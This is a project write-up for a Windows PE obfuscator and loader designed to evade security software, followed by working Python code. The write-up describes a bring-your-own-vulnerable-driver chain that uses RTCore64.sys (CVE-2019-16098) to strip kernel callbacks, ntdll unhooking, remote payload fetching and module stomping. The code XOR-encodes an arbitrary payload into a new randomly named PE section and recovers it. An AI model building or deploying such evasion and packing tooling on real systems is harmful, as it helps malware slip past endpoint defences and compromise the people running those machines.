PE-Obfuscator: PE obfuscator with Evasion in mind

PE obfuscator written with evasion in mind. It needs administrator privileges in order to load the RTCore64 driver: RTCore64.sys is the MSI Afterburner driver, and CVE-2019-16098 lets any user who can open its device read and write arbitrary kernel memory, which the loader below abuses as a bring-your-own-vulnerable-driver primitive. Two caveats for anyone trying it: installing a driver service needs SeLoadDriverPrivilege (hence the admin requirement), and RTCore64.sys is on Microsoft's vulnerable driver blocklist, so the load is refused on systems that enforce that blocklist or HVCI.

The Obfuscator:

– Fetches the XORed payload PE from a remote server (the payload stays fileless: it only ever reaches disk in XORed form, inside the loader)
– Drops the loader onto disk
– Adds a new section with a random name to that loader
– Writes the XORed payload PE into the newly created section

The Loader:

– Unhooks ntdll by mapping the clean copy from the \KnownDlls section object and restoring the hooked code over the in-process image
– Drops RTCore64.sys to disk
– Installs and loads RTCore64 (creates the driver service and starts it)
– Exploits RTCore64's arbitrary kernel read/write to remove the kernel callbacks that security products register
– XORs the payload PE back to its original form
– Maps and loads the decoded PE from the added section
– Stomps a large legitimate module big enough to hold the payload, so the payload runs from image-backed memory instead of a private allocation
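
Two of the steps above, the obfuscator writing the XORed PE into a freshly added section and the loader finding that section and XORing it back, as an added worked example. This is our code, not PE-Obfuscator's, and it uses only the Python standard library. It assumes a repeating-key XOR, a section name of "." plus seven random letters, and sections in ascending RVA order (which the PE spec requires); `build_minimal_pe64()` is a constructed 1 KiB PE32+ that stands in for the dropped loader so the script runs offline. Nothing here touches RTCore64 or kernel callbacks.

```python
"""Add a random-named section to a PE and embed an XOR-encoded payload in it.
Added example, not PE-Obfuscator's code; standard library only. Assumptions (ours):
repeating-key XOR, '.'+7 random letters as the section name, sections in ascending
RVA order (as the PE spec requires). build_minimal_pe64() is a constructed stand-in
for the dropped loader so everything runs offline."""
import secrets
import string
import struct

SECTION_HDR = '<8sIIIIIIHHI'          # IMAGE_SECTION_HEADER, 40 bytes
SECTION_HDR_SIZE = struct.calcsize(SECTION_HDR)
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_READ = 0x40000000

def _align(value, alignment):
    return (value + alignment - 1) // alignment * alignment

def xor_bytes(data, key):
    """Repeating-key XOR; applying it twice with the same key returns the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def random_section_name():
    # Assumption: '.' plus seven lowercase letters, so it resembles a compiler-generated name.
    return b'.' + ''.join(secrets.choice(string.ascii_lowercase) for _ in range(7)).encode()

def _headers(pe):
    """Return (file_header_off, optional_header_off, section_table_off, num_sections)."""
    if pe[:2] != b'MZ':
        raise ValueError('missing MZ signature')
    e_lfanew, = struct.unpack_from('<I', pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b'PE\0\0':
        raise ValueError('missing PE signature')
    file_hdr = e_lfanew + 4
    num_sections, = struct.unpack_from('<H', pe, file_hdr + 2)
    opt_size, = struct.unpack_from('<H', pe, file_hdr + 16)
    return file_hdr, file_hdr + 20, file_hdr + 20 + opt_size, num_sections

def add_section(pe, name, data, characteristics=IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ):
    """Obfuscator side: append a section holding `data` and patch the headers for it.
    Breaks any Authenticode signature on the loader; the PE checksum is not recomputed."""
    buf = bytearray(pe)
    file_hdr, opt, sec_table, n = _headers(buf)
    section_align, file_align = struct.unpack_from('<II', buf, opt + 32)
    size_of_headers, = struct.unpack_from('<I', buf, opt + 60)
    new_hdr = sec_table + n * SECTION_HDR_SIZE
    if new_hdr + SECTION_HDR_SIZE > size_of_headers:
        raise ValueError('no slack left in the header area for another section header')
    # The last section ends the image, so the new section's RVA starts right after it.
    _, vsize, va, rawsize, *_ = struct.unpack_from(SECTION_HDR, buf, new_hdr - SECTION_HDR_SIZE)
    new_va = _align(va + max(vsize, rawsize), section_align)
    new_raw_ptr = _align(len(buf), file_align)
    new_raw_size = _align(len(data), file_align)
    struct.pack_into(SECTION_HDR, buf, new_hdr, name[:8].ljust(8, b'\0'), len(data), new_va,
                     new_raw_size, new_raw_ptr, 0, 0, 0, 0, characteristics)
    struct.pack_into('<H', buf, file_hdr + 2, n + 1)                                  # NumberOfSections
    struct.pack_into('<I', buf, opt + 56, _align(new_va + len(data), section_align))  # SizeOfImage
    buf += b'\0' * (new_raw_ptr - len(buf)) + data.ljust(new_raw_size, b'\0')
    return bytes(buf)

def section_names(pe):
    _, _, sec_table, n = _headers(pe)
    return [struct.unpack_from('<8s', pe, sec_table + i * SECTION_HDR_SIZE)[0].rstrip(b'\0')
            for i in range(n)]

def read_section(pe, name):
    """Loader side: locate the section by name and return its VirtualSize bytes. We read the
    file image via PointerToRawData; a running loader adds VirtualAddress to its module base."""
    _, _, sec_table, n = _headers(pe)
    want = name[:8].ljust(8, b'\0')
    for i in range(n):
        hdr = struct.unpack_from(SECTION_HDR, pe, sec_table + i * SECTION_HDR_SIZE)
        if hdr[0] == want:
            return bytes(pe[hdr[4]:hdr[4] + hdr[1]])   # hdr[4]=PointerToRawData, hdr[1]=VirtualSize
    raise KeyError(name)

def embed_payload(loader, payload, key, name=None):
    """Obfuscator: XOR the payload and store it in a new section; returns (stub, section name)."""
    name = name or random_section_name()
    return add_section(loader, name, xor_bytes(payload, key)), name

def recover_payload(stub, name, key):
    """Loader: pull the section back out and undo the XOR."""
    return xor_bytes(read_section(stub, name), key)

def build_minimal_pe64():
    """Constructed 1 KiB PE32+ with one .text section holding a single `ret`."""
    dos = bytearray(b'MZ').ljust(64, b'\0')
    struct.pack_into('<I', dos, 0x3C, 64)                       # e_lfanew
    file_hdr = struct.pack('<HHIIIHH', 0x8664, 1, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)                                        # IMAGE_OPTIONAL_HEADER64
    struct.pack_into('<H', opt, 0, 0x20B)                       # Magic: PE32+
    struct.pack_into('<II', opt, 16, 0x1000, 0x1000)            # AddressOfEntryPoint, BaseOfCode
    struct.pack_into('<Q', opt, 24, 0x140000000)                # ImageBase
    struct.pack_into('<II', opt, 32, 0x1000, 0x200)             # SectionAlignment, FileAlignment
    struct.pack_into('<II', opt, 56, 0x2000, 0x200)             # SizeOfImage, SizeOfHeaders
    struct.pack_into('<H', opt, 68, 3)                          # Subsystem: console
    struct.pack_into('<I', opt, 108, 16)                        # NumberOfRvaAndSizes
    text = struct.pack(SECTION_HDR, b'.text', 1, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b'PE\0\0' + file_hdr + opt + text).ljust(0x200, b'\0')
    return bytes(headers + b'\xC3'.ljust(0x200, b'\0'))
```

Usage: `stub, name = embed_payload(build_minimal_pe64(), payload, key)` produces the on-disk loader with the XORed payload appended as a new section, and `recover_payload(stub, name, key)` is what the loader does at run time before mapping the PE. The header-slack check matters in practice: most linkers pad the header area to FileAlignment, which normally leaves room for a few extra section headers, but if it is full the section table cannot grow without relocating the existing sections.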
